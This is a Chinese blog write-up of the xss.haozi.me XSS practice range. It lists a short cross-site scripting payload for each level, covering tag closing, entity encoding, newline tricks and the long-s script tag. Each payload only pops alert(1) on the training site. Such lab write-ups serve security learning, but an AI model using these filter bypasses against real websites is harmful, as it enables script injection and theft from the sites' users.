xss.haozi靶场详解

于 2024-08-07 19:58:40 发布
阅读量265 收藏 1
点赞数 10
分类专栏: 靶场 文章标签: xss 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62457642/article/details/140999997
版权

0x00

直接输入即可

<script>alert(1)</script>

image.png

0x01

image.png
正常输入发现被下面注释了
只需要加个闭合即可

</textarea><script>alert(1)</script>

image.png

0x02

这关就是闭合问题

"><script>alert(1)</script>

image.png

0x03

image.png
正常输入发现()被过滤了
将括号改为反引号即可

<script>alert`1`</script>

image.png

0x04

image.png
查看源码发现()和`都被过滤了
尝试使用编码

<svg><script>alert&#40;1&#41;</script>

image.png

0x05

image.png
直接闭合即可

--!><script>alert(1)</script>

image.png

0x06

image.png
查看源码,正则表达式过滤了以auto或on开头,=结尾的字符串或>
发现换行符没被过滤

type="image" src onerror
=alert(1)

image.png

0x07

查看源码发现过滤了html标签
使用不依靠标签触发的onerror绕过

<img src onerror='alert(1)'

image.png

0x08

image.png
给它上下分别闭合
image.png
被注释成了/坏人/,利用换行绕过

</style
>
<script>alert(1)</script>
<style>

image.png

0x09

image.png
查看源码发现要输入正确的网址
image.png
将上一个

http://www.segmentfault.com"></script><img src onerror="alert(1)"

image.png

0x0A

https://www.segmentfault.com.haozi.me/j.js

image.png

0x0B

image.png
发现被转成大写了
尝试onerror绕过
image.png
把alert转义试试

<img src onerror=&#97;&#108;&#101;&#114;&#116;(1)>

image.png

0x0C

直接把上一关的拿来用

<img src onerror=&#97;&#108;&#101;&#114;&#116;(1)>

image.png

0x0D

image.png
正常输入发现会被注释掉
image.png
换行可以跳过注释
–>可以将一整行注释掉


alert(1);
-->

image.png

0x0E

<ſcript src=https://www.segmentfault.com.haozi.me/j.js></script>

image.png

0x0F

image.png
被注释掉了,闭合掉即可

');alert('1

image.png

0x10

image.png
直接构造alert(1)即可

0x11

“被注释为\,但不影响使用,正常闭合即可

");alert("1

image.png

0x12

没有过滤

</script>
<script>alert(1)</script>

image.png

秋妤.
关注
  • 10
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss.js.zip
07-29
"xss.js.zip"是一个专注于防止XSS攻击的JavaScript模块,它通过严格的输入过滤和白名单策略来确保用户提交的内容不会引入潜在的恶意代码。 首先,"xss.js"的核心功能在于提供了一套完整的输入过滤机制。这个模块会...
SpringBoot整合XSS.zip
04-30
1. **XSS攻击简介**:XSS(Cross Site Scripting)是一种常见的网络攻击方式,攻击者通过在网页上注入恶意脚本,使得用户在不知情的情况下执行这些脚本,从而获取敏感信息或执行恶意操作。XSS攻击通常分为反射型、...
xss.haozi.me靶场详解
m0_46467017的博客
07-28 2139
由于xss.haozi.me是一个在线靶场,服务部署在Github,若网速不好,则需要科学上网。由于本靶场是一个白盒测试的靶场,我们可以看到代码的源码,所以可以直接根据源码的限制的条件来思考如何绕过。...
xss.haozi.me靶场“0x0B-0x12”通关教程
钟言的博客
03-13 4545
本篇xss.haozi.me靶场的“0x0B-0x12”通关教程,详细内容包含了一、0x0B 实体编码绕过 二、0x0C script绕过 三、0x0D 注释绕过 四、0X0E ſ符号绕过 五、0x0F 编码解码 六、0x10 直接执行 七、0x11 闭合绕过 八、0x12 闭合绕过等内容
xss.haozi.me靶场“0x00-0x0A”通关教程
钟言的博客
03-12 5422
本篇介绍了xss.haozi.me靶场0x00到0x0A通关教程,详细内容包含了:一、靶场介绍 二、第一关 0x00 不做限制 三、第二关 0x01 文本闭合标签绕过 四、第三关 0x02 双引号闭合绕过 五、第四关 0x03 过滤括号 六、第五关 0x04 编码绕过 七、第六关 0x05 注释闭合绕过 八、第七关 0x06 换行绕过 九、第八关 0x07 删除标签 十、第九关 0x08 多加空格绕过 十一、第十关 0x09 闭合绕过 十二、第十一关 0x0A JS调用等内容
xss.haozi练习通关详解
金色%夕阳的博客
08-01 1951
xss.haozi练习通关概述 0x00 分析: 执行: 0x01 分析: 执行: 0x02 分析: 执行: 0x03 分析: 执行: 0x04 分析: 执行: 0x05 分析: 执行: 0x06 分析: 执行: 0x07
xss靶场xss.haozi.me靶场详细通关教程
LawnCat的博客
03-27 2323
靶场来自xss.haozi.me,其中一些解题方法也是根据官方的题解。该文章主要用于记录自己的学习历程。xss.haozi.me是一个学习xss漏洞非常不错的靶场,里面集合了各种绕过方式,对于小白来说非常具有学习意义。
xss.haozi.me靶场通关参考
爆金币了,老登!
06-19 819
全关卡记录,所有靶场的payload
XSS漏洞:xss.haozi.me靶场通关
qq_68163788的博客
01-18 2072
xss.haozi.me是一个专门用于测试和学习跨站脚本(XSS)漏洞的靶场XSS漏洞是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,可以获取用户的敏感信息,如Cookie、会话令牌等。 通关xss.haozi.me靶场意味着成功利用了该靶场中的XSS漏洞,并完成了相应的任务。在这个过程中,你需要利用各种XSS漏洞,包括反射型XSS、存储型XSS等,来实现跨站脚本攻击,并获取相应的flag或者完成指定的任务。 通过通关xss.haozi.me靶场,你可以提升自己的Web安全技能,了解XSS
xss.haozi.me靶场练习
m0_70349048的博客
02-28 883
xss攻击
xss.haozi靶场通关
weixin_60719780的博客
01-06 387
做完xss-labs靶场后,再继续做这个靶场,感觉这个不是很难,毕竟在第一个靶场也获取了一些经验,但是这个靶场偏向技巧,所以还是以了解为主。
XSS.rar_XSS
09-22
XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全问题,尤其是在Web前端开发中尤为突出。XSS攻击允许攻击者在用户浏览器上执行恶意脚本,从而窃取用户数据、操纵用户界面或者执行其他有害操作。以下...
xss.js:简单的基于白名单的 html sanitizer
06-21
4. **自定义配置**:为了满足不同场景的需求,`xss.js`可能提供自定义白名单配置的选项,允许开发者根据自己的应用需求添加或移除元素和属性。 5. **兼容性**:作为一个JavaScript库,`xss.js`应该考虑各种浏览器的...
sql和xss靶场资料包.zip
12-21
bWAPP latest.zip DVWA-master.zip pikachu-master.zip sqli-labs-master.zip upload-labs-master-21.zip xss闯关小游戏.Zip xxe-lab-masteri靶场.rar PhpStudy20180211.zip vc9x86(必装).eXe vc11 x86.exe
CTFHub技能树web——XSS——DOM反射
qq_48368964的博客
08-02 439
创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中。根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式。然后去网页测试一下alert(1)反射。看到 确实存在 去xssaq.cn。
xss漏洞(三,xss进阶利用)
最新发布
2302_80280669的博客
08-03 581
假如dvwa是你常用的网站,并且已经登录,你不知道此页面存在xss注入,黑客利用xss漏洞获取你cookie.他先打开此网站,构造了恶意语句,然后拿到URL,把URL进行包装,最后发给受害者你,你作为受害者一点击,自己的cookie就发送到了黑客特定的的文件里,黑客就拿到了你的cookie。本段代码的整体含义为:插入地址为1的图片,若无法执行(报错),便执行弹窗为‘hello’的操作。标签是将一张图嵌入的意思,src=后跟所嵌入的图片地址,onError=后跟若前面的代码无法执行所进行的操作。
CTFHub——XSS——反射型
qq_48368964的博客
08-01 407
平台测试语句注入,将得到的url编码地址填入url框(此过程模拟用户被诱导点击链接)发现为表单式,猜测哪个可能存在注入漏洞,分别做测试注入发现name框存在。但不是对方cookie,参考wp发现要用xss线上平台。
xss漏洞(二,xss靶场搭建以及简单利用)
2302_80280669的博客
08-02 404
使用工具:PHP study,dvwa靶场
xss-labs靶场通关详解
08-26
对不起,我无法提供有关特定靶场 "xss-labs" 的详细通关解释,因为我无法直接访问互联网或搜索特定的信息。然而,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本注入到网页中,从而获取用户敏感信息或在用户浏览器中执行恶意操作。 通常,成功通过XSS-labs靶场的关键是了解XSS漏洞的原理和常见的防御措施。你可以通过学习相关的网络安全知识和参加相关的训练课程来提高对XSS漏洞的理解和攻防能力。同时,使用漏洞扫描工具和安全审计工具,如Burp Suite、OWASP ZAP等,可以帮助你发现并修复可能存在的XSS漏洞。 请记住,在进行任何安全测试或攻击前,确保获得合法的授权,并遵守适用的法律和道德准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值